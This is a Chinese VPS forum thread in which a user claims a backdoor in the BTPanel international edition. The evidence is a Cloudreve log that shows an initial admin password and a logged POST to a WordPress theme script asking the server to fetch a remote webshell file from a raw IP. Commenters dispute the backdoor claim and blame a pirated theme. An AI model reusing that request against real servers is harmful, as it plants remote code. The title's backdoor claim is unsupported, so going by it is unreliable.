vps交流

[美国VPS] 宝塔国际版 BTPanel 疑似有后门,已确定


昨天安装了个国际版,今天就安装了个Cloudreve正版。然后反带,用Supervisor进程守护,查看日志便是如下

https://s1.ax1x.com/2022/09/15/vxYNe1.png

[Info]    2022-09-14 19:25:49 初始化数据库连接
[Info]    2022-09-14 19:25:49 开始进行数据库初始化…
[Info]    2022-09-14 19:26:03 初始管理员账号:[email protected]
[Info]    2022-09-14 19:26:03 初始管理员密码:DrPu1C5i
[Info]    2022-09-14 19:26:11 开始执行数据库脚本 [UpgradeTo3.4.0]
[Info]    2022-09-14 19:26:11 数据库初始化结束
[Info]    2022-09-14 19:26:11 初始化任务队列,WorkerNum = 10
[Info]    2022-09-14 19:26:11 初始化定时任务…
[Info]    2022-09-14 19:26:11 当前运行模式:Master
[Info]    2022-09-14 19:26:11 已连接到 Redis 服务器:127.0.0.1:6379
[Info]    2022-09-14 19:26:11 开始监听 :5212
[GIN] 2022/09/14 – 19:26:22 | 200 |    6.742758ms |   152.89.196.13 | POST     "/wp-content/themes/busify/bindex.php?url=http://152.89.196.13/b.txt"

http://152.89.196.13/b.txt  这个小马文件

不知道哪一个环节被k了

没文化的人 总是担心被害 想搞个大新闻
盗版主题吧?
从小白的角度判断,你这锅主题得背
不懂帮顶、、、
你wordpress用的盗版插件或者主题了吧,和面板没关系吧
哪个版本的宝塔
这是wp主题目录
看看你的WP主题哪个是busify,这个主题有小马
你这只装了cloudreve ,怎么还会有WordPress?
换个Wordpress主题